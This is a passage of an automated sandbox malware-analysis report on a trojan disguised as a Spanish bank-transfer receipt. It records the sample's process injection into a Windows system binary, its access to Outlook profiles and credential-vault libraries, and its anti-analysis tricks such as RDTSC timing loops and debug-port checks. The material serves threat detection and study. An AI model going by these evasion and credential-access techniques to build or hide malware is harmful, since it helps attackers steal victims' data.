            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04CA5AA09_2_04CA5AA0
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04D01AA39_2_04D01AA3
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04D17A469_2_04D17A46
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04D1FA499_2_04D1FA49
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04CD3A6C9_2_04CD3A6C
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C9DBF99_2_04C9DBF9
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04CD5BF09_2_04CD5BF0
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C7FB809_2_04C7FB80
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04D1FB769_2_04D1FB76
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C41D909_2_00C41D90
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C3CC209_2_00C3CC20
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C3CE409_2_00C3CE40
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C3AE309_2_00C3AE30
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C3AF809_2_00C3AF80
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C3AF749_2_00C3AF74
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C454509_2_00C45450
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C4365B9_2_00C4365B
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C436609_2_00C43660
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C5BBE09_2_00C5BBE0
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04ABE5F09_2_04ABE5F0
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04ABD6B89_2_04ABD6B8
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04ABE1389_2_04ABE138
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04ABE2539_2_04ABE253
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04ABC8B49_2_04ABC8B4
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04ABC9789_2_04ABC978
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04CCEA12 appears 86 times
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04C4B970 appears 283 times
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04CDF290 appears 105 times
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04CA7E54 appears 109 times
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04C95130 appears 58 times
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: String function: 36A2F290 appears 105 times
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: String function: 3699B970 appears 283 times
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: String function: 369F7E54 appears 111 times
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: String function: 36A1EA12 appears 86 times
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: String function: 369E5130 appears 58 times
            Source: justificante de transferencia09454545.exe, 00000001.00000002.3068665350.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelicans voldelighederne.exe4 vs justificante de transferencia09454545.exe
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3305661830.0000000036737000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs justificante de transferencia09454545.exe
            Source: justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036C41000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs justificante de transferencia09454545.exe
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3307432584.00000000368F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs justificante de transferencia09454545.exe
            Source: justificante de transferencia09454545.exe, 00000006.00000002.3400854216.0000000006746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameicsunattend.exej% vs justificante de transferencia09454545.exe
            Source: justificante de transferencia09454545.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/18@5/5
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_00404587 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404587
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_0040206A CoCreateInstance,1_2_0040206A
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeFile created: C:\Users\user\Documents\Transistorers156.iniJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE52B.tmpJump to behavior
            Source: justificante de transferencia09454545.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: justificante de transferencia09454545.exeVirustotal: Detection: 52%
            Source: justificante de transferencia09454545.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeFile read: C:\Users\user\Desktop\justificante de transferencia09454545.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\justificante de transferencia09454545.exe "C:\Users\user\Desktop\justificante de transferencia09454545.exe"
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeProcess created: C:\Users\user\Desktop\justificante de transferencia09454545.exe "C:\Users\user\Desktop\justificante de transferencia09454545.exe"
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeProcess created: C:\Users\user\Desktop\justificante de transferencia09454545.exe "C:\Users\user\Desktop\justificante de transferencia09454545.exe"Jump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: mshtml.pdb source: justificante de transferencia09454545.exe, 00000006.00000001.3068398935.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: justificante de transferencia09454545.exe, 00000006.00000003.3305661830.0000000036614000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036B0E000.00000040.00001000.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3307432584.00000000367C9000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036970000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: justificante de transferencia09454545.exe, justificante de transferencia09454545.exe, 00000006.00000003.3305661830.0000000036614000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036B0E000.00000040.00001000.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000003.3307432584.00000000367C9000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3424335085.0000000036970000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe
            Source: Binary string: icsunattend.pdbGCTL source: justificante de transferencia09454545.exe, 00000006.00000002.3400854216.0000000006746000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: justificante de transferencia09454545.exe, 00000006.00000001.3068398935.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: icsunattend.pdb source: justificante de transferencia09454545.exe, 00000006.00000002.3400854216.0000000006746000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000006.00000002.3394609579.0000000005E3C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.3069598496.000000000781C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_00406207 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406207
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_10002D50 push eax; ret 1_2_10002D7E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3697135D push eax; iretd 6_2_36971369
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369727FA pushad ; ret 6_2_369727F9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3697225F pushad ; ret 6_2_369727F9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3697283D push eax; iretd 6_2_36972858
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A09AD push ecx; mov dword ptr [esp], ecx6_2_369A09B6
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_03520B64 push ds; iretd 8_2_03520B03
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_0352BBD1 push FFFFFFF3h; retf 8_2_0352BBD3
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_0352AA2A push FFFFFF89h; iretd 8_2_0352AA3C
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_0351F22A push ecx; retf 8_2_0351F22C
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_0351B94B push FFFFFFBBh; ret 8_2_0351B9BD
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_03520978 push ss; ret 8_2_03520980
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_0351B996 push FFFFFFBBh; ret 8_2_0351B9BD
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_03210000 pushad ; iretd 8_2_03210001
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_0351F0CB pushfd ; iretd 8_2_0351F0CC
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeCode function: 8_2_03528F80 pushad ; ret 8_2_03528F81
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C227FA pushad ; ret 9_2_04C227F9
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C2225F pushad ; ret 9_2_04C227F9
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C2283D push eax; iretd 9_2_04C22858
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C509AD push ecx; mov dword ptr [esp], ecx9_2_04C509B6
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C21200 push edx; retn 0004h9_2_04C21206
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C218A7 push ds; ret 9_2_04C2198E
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C219DB push 262804D4h; ret 9_2_04C219EA
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_04C29939 push es; iretd 9_2_04C29940
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C44138 push FFFFFF89h; iretd 9_2_00C4414A
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C3E2AA push ecx; retf 9_2_00C3E32B
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C4268E pushad ; ret 9_2_00C4268F
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C387D9 pushfd ; iretd 9_2_00C387DA
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C38938 push ecx; retf 9_2_00C3893A
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C350A4 push FFFFFFBBh; ret 9_2_00C350CB
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C35059 push FFFFFFBBh; ret 9_2_00C350CB
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeFile created: C:\Users\user\AppData\Local\Temp\nsqE646.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeAPI/Special instruction interceptor: Address: 796E304
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeAPI/Special instruction interceptor: Address: 5F8E304
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeRDTSC instruction interceptor: First address: 7945C26 second address: 7945C26 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE0D47E586Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeRDTSC instruction interceptor: First address: 5F65C26 second address: 5F65C26 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE0D4E0F8AAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A716A6 rdtsc 6_2_36A716A6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqE646.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeAPI coverage: 0.2 %
            Source: C:\Windows\SysWOW64\icsunattend.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\icsunattend.exe TID: 5896Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_0040572C CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_0040572C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_004061E0 FindFirstFileW,FindClose,1_2_004061E0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_00402706 FindFirstFileW,1_2_00402706
            Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 9_2_00C4C670 FindFirstFileW,FindNextFileW,FindClose,9_2_00C4C670
            Source: justificante de transferencia09454545.exe, 00000006.00000003.3306195707.0000000006738000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3400788425.0000000006716000.00000004.00000020.00020000.00000000.sdmp, justificante de transferencia09454545.exe, 00000006.00000002.3400788425.00000000066D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeAPI call chain: ExitProcess graph end nodegraph_1-4493
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeAPI call chain: ExitProcess graph end nodegraph_1-4499
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A716A6 rdtsc 6_2_36A716A6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E35C0 NtCreateMutant,LdrInitializeThunk,6_2_369E35C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_00406207 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406207
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369976B2 mov eax, dword ptr fs:[00000030h]6_2_369976B2
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369976B2 mov eax, dword ptr fs:[00000030h]6_2_369976B2
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369976B2 mov eax, dword ptr fs:[00000030h]6_2_369976B2
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2368C mov eax, dword ptr fs:[00000030h]6_2_36A2368C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2368C mov eax, dword ptr fs:[00000030h]6_2_36A2368C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2368C mov eax, dword ptr fs:[00000030h]6_2_36A2368C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2368C mov eax, dword ptr fs:[00000030h]6_2_36A2368C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699D6AA mov eax, dword ptr fs:[00000030h]6_2_3699D6AA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699D6AA mov eax, dword ptr fs:[00000030h]6_2_3699D6AA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A336EE mov eax, dword ptr fs:[00000030h]6_2_36A336EE
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A336EE mov eax, dword ptr fs:[00000030h]6_2_36A336EE
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A336EE mov eax, dword ptr fs:[00000030h]6_2_36A336EE
